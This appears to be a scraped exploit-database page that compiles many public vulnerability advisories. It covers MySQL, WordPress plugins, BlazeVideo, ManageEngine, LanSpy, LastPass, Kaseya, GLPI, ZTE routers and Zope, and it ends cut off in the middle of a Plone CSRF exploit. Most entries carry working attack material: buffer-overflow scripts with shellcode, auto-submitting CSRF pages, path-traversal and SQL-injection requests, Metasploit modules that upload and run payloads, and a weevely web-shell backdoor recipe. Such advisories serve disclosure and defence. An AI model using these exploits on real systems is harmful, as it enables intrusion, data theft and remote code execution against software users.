HireHackking

source: https://www.securityfocus.com/bid/58511/info MySQL and MariaDB are prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. "select astext(0x0100000000030000000100000000000010);"

source: https://www.securityfocus.com/bid/58599/info The Occasions plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Occasions 1.0.4 is vulnerable; other versions may also be affected. <html> <head><title>CSRF Occasions</title></head> <body> <!-- www.example.com:9001/wordpress --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST"> <input type="hidden" name="action" value="saveoccasions" /> <input type="hidden" name="nodes[]" value="1" /> <input type="hidden" name="occ_title1" value="CSRF Vulnerability" /> <input type="hidden" name="occ_startdate1" value="18.03." /> <input type="hidden" name="occ_enddate1" value="28.03." /> <input type="hidden" name="occ_type1" value="1" /> <input type="hidden" name="occ_content1" value="<script>alert(1)</script>" /> <script>document.forms[0].submit();</script> </form> </body> </html>

source: https://www.securityfocus.com/bid/58624/info BlazeVideo HDTV Player Standard is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition. BlazeVideo HDTV Player Standard 6.6.0.2 is vulnerable; other versions may also be affected. # Exploit Title:BlazeVideo HDTV Player Standard 6.6.0.2 SEH Buffer Overflow # Date: 19-03-2013 # Exploit Author: metacom # RST # Vendor Homepage: http://www.blazevideo.com/hdtv-player/ # Download version 6.6.0.2: www.blazevideo.com/download.php?product=blazevideo-hdtv-std # Version: BlazeVideo HDTV Player Standard 6.6.0.2 # Tested on: Windows 7 German filename="poc.PLF" junk = "http://"+ "\x41" * 601 nseh = "\xEB\x06\x90\x90" seh = "\x5F\x17\x60\x61" #6160175F \EPG.dll nops = "\x90" * 20 #windows/exec CMD=calc.exe bad \x00\x0a\x1a shellcode= ("\xb8\xaf\x8c\x07\x94\xda\xcd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" "\x33\x31\x42\x12\x83\xea\xfc\x03\xed\x82\xe5\x61\x0d\x72\x60" "\x89\xed\x83\x13\x03\x08\xb2\x01\x77\x59\xe7\x95\xf3\x0f\x04" "\x5d\x51\xbb\x9f\x13\x7e\xcc\x28\x99\x58\xe3\xa9\x2f\x65\xaf" "\x6a\x31\x19\xad\xbe\x91\x20\x7e\xb3\xd0\x65\x62\x3c\x80\x3e" "\xe9\xef\x35\x4a\xaf\x33\x37\x9c\xa4\x0c\x4f\x99\x7a\xf8\xe5" "\xa0\xaa\x51\x71\xea\x52\xd9\xdd\xcb\x63\x0e\x3e\x37\x2a\x3b" "\xf5\xc3\xad\xed\xc7\x2c\x9c\xd1\x84\x12\x11\xdc\xd5\x53\x95" "\x3f\xa0\xaf\xe6\xc2\xb3\x6b\x95\x18\x31\x6e\x3d\xea\xe1\x4a" "\xbc\x3f\x77\x18\xb2\xf4\xf3\x46\xd6\x0b\xd7\xfc\xe2\x80\xd6" "\xd2\x63\xd2\xfc\xf6\x28\x80\x9d\xaf\x94\x67\xa1\xb0\x70\xd7" "\x07\xba\x92\x0c\x31\xe1\xf8\xd3\xb3\x9f\x45\xd3\xcb\x9f\xe5" "\xbc\xfa\x14\x6a\xba\x02\xff\xcf\x34\x49\xa2\x79\xdd\x14\x36" "\x38\x80\xa6\xec\x7e\xbd\x24\x05\xfe\x3a\x34\x6c\xfb\x07\xf2" "\x9c\x71\x17\x97\xa2\x26\x18\xb2\xc0\xa9\x8a\x5e\x29\x4c\x2b" "\xc4\x35") f = open(filename,"wb") f.write(junk+nseh+seh+nops+shellcode) f.close() print("Finish")

Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal Product: ManageEngine ServiceDesk Plus Vulnerable Versions: 9.1 build 9110 and previous versions Tested Version: 9.1 build 9110 (Windows) Advisory Publication: 03/10/2015 Vulnerability Type: Unauthenticated Path Traversal Credit: xistence <xistence[at]0x90.nl> Product Description ------------------- ServiceDesk Plus is an ITIL ready IT help desk software for organizations of all sizes. With advanced ITSM functionality and easy-to-use capability, ServiceDesk Plus helps IT support teams deliver world-class services to end users with reduced costs and complexity. Over 100,000 organizations across 185 countries trust ServiceDesk Plus to optimize IT service desk performance and achieve high user satisfaction. Vulnerability Details --------------------- The "fName" parameter is vulnerable to path traversal without the need for any authentication. On Windows environments, downloading files will be done with SYSTEM privileges. This makes it possible to download any file on the filesystem. The following example will download the "win.ini" file: $ curl " http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 " ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo Solution -------- Upgrade to ServiceDesk 9.1 build 9111. Advisory Timeline ----------------- 07/10/2015 - Discovery and vendor notification 07/10/2015 - ManageEngine responsed that they will notify their development team 09/13/2015 - No response from vendor yet, asked for status update 09/24/2015 - ManageEngine responded that they've fixed the issue and assigned issue ID: SD-60283 09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released 10/03/2015 - Public disclosure

''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt Vendor: ================================ www.lantricks.com Product: ================================ LanSpy.exe LanSpy is network security and port scanner, which allows getting different information about computer: Domain and NetBios names, MAC address, Server information, Domain and Domain controller etc.... Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ====================== LanSpy.exe uses an 'addresses.txt' plain text file which lives under the main LanSpy directory the file is used to load scanned IPs or URLs e.g. 127.0.0.1 replace addresses.txt file with our malicious one, the buffer overflow payload must be the very first entry in the text file. Next, run LanSpy.exe and click green arrow or use keyboard press 'F3' to start. Then KABOOM!... program crashez and we will control EIP at 684 bytes also overwrite both the NSEH & SEH exception handler pointers... Quick stack dump... (1274.19c4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx=00000000 esi=00000000 edi=00000000 eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:001> g (1274.19c4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=52525252 edx=7714b4ad esi=00000000 edi=00000000 eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 52525252 ?? ??? 0:001> !exchain 0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad) 0264fe8c: 52525252 Invalid exception stack at 42424242 POC code(s): ============= ''' import os #LanSpy.exe buffer overflow POC #by hyp3rlinx #hyp3rlinx.altervista.org #============================= #LanSpy.exe uses an 'addresses.txt' text file #which lives under the LanSpy directory #the addresses.txt file is used to load scanned IPs or URLs #control EIP at 684 bytes... also overwrite #both the NSEH & SEH exception handler pointers #----------------------------------------------- payload="A"*684+"BBBB"+"RRRR" #<------- KABOOOOOOOOOOOOOOOOOOM! file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w") file.write(payload) file.close() ''' Public Disclosure: =================== October 5, 2015 Exploitation Technique: ======================= Local =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx '''

# Exploit Title: [AlienVault - ossim CSRF] # Date: [10-5-2015] # Exploit Author: [MohamadReza Mohajerani] # Vendor Homepage: [www.alienvault.com] # Software Link: [https://www.alienvault.com/products/ossim] # Version: [Tested on 4.3] Vulnerability Details: ===================== Multiple CSRF vectors exists within AlienVault ossim allowing the following attacks: 1)Delete user accounts(ex.admin account) 2)Delete knowledge DB items Exploit code(s): =============== The only thing the attacker needs to do is sending the following link to the victim via GET request , if the victim authenticated on the ossim and click on the link the following attacks can be occurred : 1)For deleting the knowledge DB items just send the link below: https://ossim-ip/ossim/repository/repository_delete.php?id_document=10232 [id_document is the item number which you want to delete (it starts from 1)] 2)For deleting the user accounts (ex.admin account) use the link below : https://ossim-ip/ossim/session/deleteuser.php?user=admin&_=1444042812845 [the random number (1444042812845) is not important at all and you can change the number to whatever you want] Severity Level: ================ High

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary directory leading to arbitrary code execution with IUSR privileges. This module has been tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-6922'], ['ZDI', '15-449'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'], ['URL', 'http://seclists.org/bugtraq/2015/Sep/132'] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => false, 'Targets' => [ [ 'Kaseya VSA v7 to v9.1', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 23 2015')) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('ConfigTab','uploader.aspx') }) if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end end def upload_file(payload, path, filename, session_id) print_status("#{peer} - Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('ConfigTab', 'uploader.aspx'), 'vars_get' => { 'PathData' => path, 'qqfile' => filename }, 'data' => payload, 'ctype' => 'application/octet-stream', 'cookie' => 'sessionId=' + session_id }) if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"') return true else return false end end def exploit res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('ConfigTab','uploader.aspx') }) if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/ session_id = $1 else fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session") end asp_name = "#{rand_text_alpha_lower(8)}.asp" exe = generate_payload_exe payload = Msf::Util::EXE.to_exe_asp(exe).to_s paths = [ # We have to guess the path, so just try the most common directories 'C:\\Kaseya\\WebPages\\', 'C:\\Program Files\\Kaseya\\WebPages\\', 'C:\\Program Files (x86)\\Kaseya\\WebPages\\', 'D:\\Kaseya\\WebPages\\', 'D:\\Program Files\\Kaseya\\WebPages\\', 'D:\\Program Files (x86)\\Kaseya\\WebPages\\', 'E:\\Kaseya\\WebPages\\', 'E:\\Program Files\\Kaseya\\WebPages\\', 'E:\\Program Files (x86)\\Kaseya\\WebPages\\', ] paths.each do |path| if upload_file(payload, path, asp_name, session_id) register_files_for_cleanup(path + asp_name) print_status("#{peer} - Executing payload #{asp_name}") send_request_cgi({ 'uri' => normalize_uri(asp_name), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end end

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Zemra Botnet CnC Web Panel Remote Code Execution', 'Description' => %q{ This module exploits the CnC web panel of Zemra Botnet which contains a backdoor inside its leaked source code. Zemra is a crimeware bot that can be used to conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jay Turla <@shipcod3>', #Metasploit Module 'Angel Injection', #Initial Discovery (PoC from Inj3ct0r Team) 'Darren Martyn <@info_dox>' #Initial Discovery ], 'References' => [ ['URL', 'http://0day.today/exploit/19259'], ['URL', 'http://insecurety.net/?p=144'], #leaked source code and backdoor intro ['URL', 'http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot'] ], 'Privileged' => false, 'Payload' => { 'Space' => 10000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Platform' => %w{ unix win }, 'Arch' => ARCH_CMD, 'Targets' => [ ['zemra panel / Unix', { 'Platform' => 'unix' } ], ['zemra panel / Windows', { 'Platform' => 'win' } ] ], 'DisclosureDate' => 'Jun 28 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI',[true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]), ],self.class) end def check txt = Rex::Text.rand_text_alpha(8) http_send_command(txt) if res && res.body =~ /cmd/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def http_send_command(cmd) uri = normalize_uri(target_uri.path.to_s) res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'vars_get' => { 'cmd' => cmd } }) unless res && res.code == 200 fail_with(Failure::Unknown, 'Failed to execute the command.') end res end def exploit http_send_command(payload.encoded) end end

Source: https://code.google.com/p/google-security-research/issues/detail?id=538 Truecrypt 7 Derived Code/Windows: Drive Letter Symbolic Link Creation EoP Platform: Windows Class: Local Elevation of Privilege Tested on: VeraCrypt 1.13 x86 on Windows 10 Summary: The Windows driver used by projects derived from Truecrypt 7 (verified in Veracrypt and CipherShed) are vulnerable to a local elevation of privilege attack by abusing the drive letter symbolic link creation facilities to remap the main system drive. With the system drive remapped it’s trivial to get a new process running under the local system account. Description: Any user on the system can connect to the Truecrypt device object and mount a new encrypted volume. As part of this process the driver will try and create the requested drive letter by calling IoCreateSymbolicLink. To prevent redefining an existing drive letter a call is made to IsDriveLetterAvailable which attempts to open the link “\DosDevices\X:” for reading, returning FALSE if it was successfully opened. The specific code in src\Driver\Ntdriver.c is: if (NT_SUCCESS (ZwOpenSymbolicLinkObject (&handle, GENERIC_READ, &objectAttributes))) { ZwClose (handle); return FALSE; } return TRUE; The bug which allows you to bypass this is due to the use of the NT_SUCCESS macro. This means that any error opening the symbolic link will cause the drive letter to be assumed to not exist. If we can cause the open to fail in any way then we can bypass this check and mount the volume over an existing drive letter. This is possible because with terminal services support the \DosDevices path points to a special fake path \?? which first maps to a per-user writable location (under \Sessions\0\DosDevices) before falling back to \GLOBAL??. When the kernel creates a new object under \?? is creates it in the per-user location instead so there’s no conflict with a drive symbolic link in \GLOBAL??. So how to bypass the check? The simplest trick is to just create any other type of object with that name, such as an object directory. This will cause ZwOpenSymbolicLink to fail with STATUS_OBJECT_TYPE_MISMATCH passing the check. This in itself would only cause problems for the current user if it wasn’t for the fact that there exists a way of replacing the current processes device map directory using the NtSetInformationProcess system call. You can set any object directory to this which allows you DIRECTORY_TRAVERSE privilege, which is pretty much anything. In particular we can set the \GLOBAL?? directory itself. So to exploit this and remap the C: drive to the truecrypt volume we do the following: 1) Set the current process’s device map to a new object directory. Create a new object called C: inside the device map directory. 2) Mount a volume (not using the mount manager) and request the C: drive mapping. The IsDriveLetterAvailable will return TRUE. 3) Wait for the driver to open the volume and at that point delete the fake C: object (if we don’t do this then the creation will fail). While this looks like a race condition (which you can win pretty easily through brute force) you can use things like OPLOCKs to give 100% reliability. 4) The mount will complete writing a new C: symbolic link to the device map. 5) Set the \GLOBAL?? directory as the new process device map directory. 6) Unmount the volume, this calls IoDeleteSymbolicLink with \DosDevices\C: which actually ends up deleting \GLOBAL??\C: 7) Remount the volume as the C: drive again (you’ll obviously need to not use C: when referring to the volume location). The user now has complete control over the contents of C:. Fixing the Issue: While technically IsDriveLetterAvailable is at fault I don’t believe fixing it would completely remove the issue. However changing IsDriveLetterAvailable to only return FALSE if STATUS_OBJECT_NAME_NOT_FOUND is returned from the ZwOpenSymbolicLink object would make it a lot harder to bypass the check. Also I don’t know if specifying the use of the mount volume driver would affect this. The correct fix would be to decide where the symbolic link is supposed to be written to and specify it explicitly. As in if you want to ensure it gets written to the current user’s drive mapping then specify the per-user directory at \Sessions\0\DosDevices\X-Y where X-Y is the authentication ID got from the SeQueryAuthenticationIdToken API. Or if it’s supposed to be in the global drive names then specify \GLOBAL??. Note this probably won’t work on pre-fast user switching versions of XP or Windows 2000 (assuming you’re still willing to support those platforms). Also I’d recommend if going the per-user route then only use the primary token (using PsReferencePrimaryToken) to determine the authentication ID as that avoids any mistakes with impersonation tokens. There’s no reason to believe that this would cause compat issues as I wouldn’t expect the normal user tool to use impersonation to map the drive for another user. Note this wasn’t reported in the iSec Partners security review so it’s not an missed fix. Proof of Concept: I’ve provided a PoC, you’ll need to build it with VS2015. It will change an arbitrary global drive letter to a VeraCrypt volume. Note it only works on VeraCrypt but it might be possible to trivially change to work on any other truecrypt derived products. You MUST build an executable to match the OS bitness otherwise it will not work. To test the PoC use the following steps. 1. Create a veracrypt volume using the normal GUI, the PoC doesn’t do this for you. Don’t mount the volume. 2. Execute the PoC, passing the drive letter you want to replace, the path to the volume file and the password for the file. e.g. MountVeracryptVolume C: c:\path\to\volume.hc password. 3. If all worked as expected eventually the PoC should print Done. At this point the drive letter you specified has been replaced with the truecrypt volume. As long as you have a command prompt open you should be able to see that the C: drive is now pointing at the encrypted volume. You can hit enter to exit the program and unmount the volume, however if you’ve replaced the system drive such as C: this will likely cause the OS to become unusable pretty quickly. Expected Result: It shouldn’t be possible to mount the volume over a global drive. Observed Result: The global drive specified has been replaced with a link to the encrypted volume. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38403.zip

''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANWHOIS-BUFFER-OVERFLOW-10062015.txt Vendor: ================================ www.lantricks.com Product: ================================ LanWhoIs.exe 1.0.1.120 LanWhoIs querys and returns domain (site) holder or IP address informations. Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ====================== LanWhoIs contains a file parsing stack buffer overflow vulnerability. The program has a whois_result.xml XML file located under the LanWhoIs directory. This file holds results returned from program queries. If LanWhoIs is installed under c:\ instead of 'Program Files' etc.. on shared PC and a non adminstrator user has access they can still edit the whois_result.xml, abusing the vuln program and possibly escalate privileges or run arbitrary code etc. e.g. <WhoisResult> <Result> <QueryString>216.239.37.99</QueryString> <ServerName>whois.arin.net</ServerName> <QueryDate>02.01.2005 16:17:30</QueryDate> <QueryType>-1</QueryType> We can exploit the program by injecting malicious payload into the <QueryString> node of the local XML file causing buffer overflow overwriting both pointers to the NSEH & SEH exception handlers & control EIP at about 676 bytes. e.g. <QueryString>AAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....shellcode...etc..</QueryString> WinDbg stack dump.... (2048.17cc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for image00400000 *** ERROR: Module load completed but symbols could not be loaded for image00400000 eax=02bdfec8 ebx=02bdff14 ecx=02bdfecc edx=41414141 esi=00000000 edi=00000000 eip=00404bc8 esp=02bdfc04 ebp=02bdfecc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 image00400000+0x4bc8: 00404bc8 8b4af8 mov ecx,dword ptr [edx-8] ds:002b:41414139=???????? 0:011> !exchain 02bdfed4: 52525252 Invalid exception stack at 42424242 registers... EAX 00000000 ECX 52525252 EDX 7714B4AD ntdll.7714B4AD EBX 00000000 ESP 04D0F668 EBP 04D0F688 ESI 00000000 EDI 00000000 EIP 52525252 POC code: ========== Run below script, then copy and insert payload into <QueryString> </QueryString> XML node and run the application. Next, select the address in the Results window pane and then click Query button to run a whois lookup or use the 'F3' keyboard cmd to execute and KABOOOOOOOOOOOOOOOM!!! ''' file=open("C:\\hyp3rlinx\\LanTricks\LanWhoIs\\HELL","w") payload="A"*676+"BBBB"+"RRRR" <--------------------#KABOOOOOOOOOOOOOOOOOOM!!! file.write(payload) file.close() ''' Public Disclosure: =================== October 6, 2015 Exploitation Technique: ======================= Local Tested on Windows 7 SP1 Vulnerable Parameter: ====================== QueryString =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx '''

============================================= MGC ALERT 2015-002 - Original release date: September 18, 2015 - Last revised: October 05, 2015 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07 II. BACKGROUND ------------------------- PHP-Fusion is a lightweight open source content management system (CMS) written in PHP. III. DESCRIPTION ------------------------- This bug was found using the portal with authentication as administrator. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code in the variable "status" on the page "members.php". IV. PROOF OF CONCEPT ------------------------- The following URL's and parameters have been confirmed to all suffer from Blind SQL injection. /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0 Exploiting with true request (with mysql5): /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0' AND substr(@@version,1,1)='5 Exploiting with false request: /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0' AND substr(@@version,1,1)='4 V. BUSINESS IMPACT ------------------------- Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED ------------------------- PHP-Fusion <= v7.02.07 VII. SOLUTION ------------------------- All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated. VIII. REFERENCES ------------------------- https://www.php-fusion.co.uk/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- September 18, 2015 1: Initial release October 10, 2015 2: Revision to send to lists XI. DISCLOSURE TIMELINE ------------------------- September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas September 18, 2015 2: Send to vendor September 24, 2015 3: Second mail to the verdor without response October 10, 2015 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester

''' ******************************************************************************************** # Exploit Title: Last PassBroker Stack-based BOF # Date: 9/23/2015 # Exploit Author: Un_N0n # Software Link: https://lastpass.com/download # Version: 3.2.16 # Tested on: Windows 7 x86(32 BIT) ******************************************************************************************** [Steps to Produce the Crash]: 1- open 'LastPassBroker.exe'. 2- A Input-Box will appear asking for Email and Password, In password field paste in the contents of crash.txt 3- Hit Login. ~Software will Crash. [Code to produce crash.txt]: ''' junk = "A"*66666 file = open("CRASH.txt",'w') file.write(junk) file.close() ''' > Vendor Notified, Fixed in latest Release. ********************************************************************************************** '''

source: https://www.securityfocus.com/bid/58658/info Jaow CMS is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Jaow CMS 2.4.8 is vulnerable; other versions may also be affected. http://www.example.com/path/add_ons.php?add_ons=[XSS]

<!-- ZTE ZXHN H108N unauthenticated config download Copyright 2015 (c) Todor Donev todor.donev@gmail.com http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg http://pastebin.com/u/hackerscommunity Tested device: Model ZXHN H108N Software Version V3.3.0_MU Description: Does not check cookies and credentials on POST method so attackers could download the config file without authentication. \!/\!/\!/ Use at your own Use at your own risk and educational risk and educational purpose ONLY! purpose ONLY! Disclaimer: This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use at your own Use at your own risk and educational risk and educational purpose ONLY! purpose ONLY! /i\/i\/i\ --> <html> <title>ZTE ZXHN H108N unauthenticated config download</title> <body onload=javascript:document.ethack.submit()> <p>ZTE ZXHN H108N Exploiting..</p> <form name="ethack" method="POST" action="http://TARGET/getpage.gch?pid=101" enctype="multipart/form-data"> <input type="hidden" name="config" id="config" value=""> </body> </html>

# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass # Date: September 7th, 2015 # Exploit Author: Raffaele Forte <raffaele@backbox.org> # Vendor Homepage: http://www.glpi-project.org/ # Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz # Version: GLPI 0.85.5 # Tested on: CentOS release 6.7 (Final), PHP 5.3.3 I. INTRODUCTION ======================================================================== GLPI is the Information Resource-Manager with an additional Administration-Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking-system with mail-notification and methods to build a database with basic information about your network-topology. II. DESCRIPTION ======================================================================== The application allows users to upgrade their own profile. The user has the possibility to add a new photo as attachment. The photo that he uploads will be stored into "GLPI_ROOT/files/_pictures/". This file, for example named "photo.jpeg", will be directly accessible through "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX" is an ID automatically generated by the system and visible in the HTML source code. Besides, the server does not check the extension of the uploaded file, but only the first bytes within it, that indicates which kind of file is. Exploiting this flaw, an attacker may upload a tampered jpeg file that contains php code placed at the end of the file, so that, just changing the file extention to ".php", by default the php code will be interpreted! To trigger this vulnerability it is necessary to have an account. This vulnerability is a combination of two issues: - predictable uploaded file names and path - upload of any kind of file, not limited to images III. PROOF OF CONCEPT ======================================================================== Generate backdoor: user@backbox:~$ weevely generate pass123 /tmp/bd.php user@backbox:~$ file /tmp/photo.jpeg /tmp/photo.jpeg: JPEG image data, JFIF standard 1.02 user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php Upload the new tampered photo in GLPI > Settings Run terminal to the target: user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123 IV. BUSINESS IMPACT ======================================================================== By uploading a interpretable php file, an attacker may be able to execute arbitrary code on the server. This flaw may compromise the integrity of the system and/or expose sensitive information. V. SYSTEMS AFFECTED ======================================================================== GLPI Version 0.85.5 is vulnerable (probably all previous versions) VI. VULNERABILITY HISTORY ======================================================================== September 7th, 2015: Vulnerability identification September 25th, 2015: Vendor notification VII. LEGAL NOTICES ======================================================================== The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuseof this information.

[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ZOPE-CSRF.txt Vendor: ================================ www.zope.org plone.org Product: ================================ Zope Management Interface 4.3.7 Zope is a Python-based application server for building secure and highly scalable web applications. Plone Is a Content Management System built on top of the open source application server Zope and the accompanying Content Management Framework. Vulnerability Type: =================== Cross site request forgery (CSRF) Multiple CSRF (cross-site request forgery) vulnerabilities in the ZMI (Zope Management Interface). Patches to Zope and Plone for multiple CSRF issues. https://plone.org/security/20151006/multiple-csrf-vulnerabilities-in-zope https://plone.org/products/plone/security/advisories/security-vulnerability-20151006-csrf CVE Reference: ============== NA Vulnerability Details: ===================== Security vulnerability: 20151006 - CSRF ZMI is mostly unprotected from CSRF vulnerabilities. Versions affected 4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.7, 4.2.6, 4.2.5, 4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2 4.1.6, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0.9, 4.0.7, 4.0.5, 4.0.4, 4.0.3, 4.0.2, 4.0.1, 4.0, 3.3.6 3.3.5, 3.3.4. 3.3.3, 3.3.2, 3.3.1, 3.3 All versions of Plone prior to 5.x are vulnerable. Fixed by Nathan Van Gheem, of the Plone Security Team Coordinated by Plone Security Team patch was released and is available from https://pypi.python.org/pypi/plone4.csrffixes Exploit code(s): =============== <!DOCTYPE> <html> <head> <title>Plone CSRF Add Linxs & Persistent XSS</title> <body onLoad="doit()"> <script> function 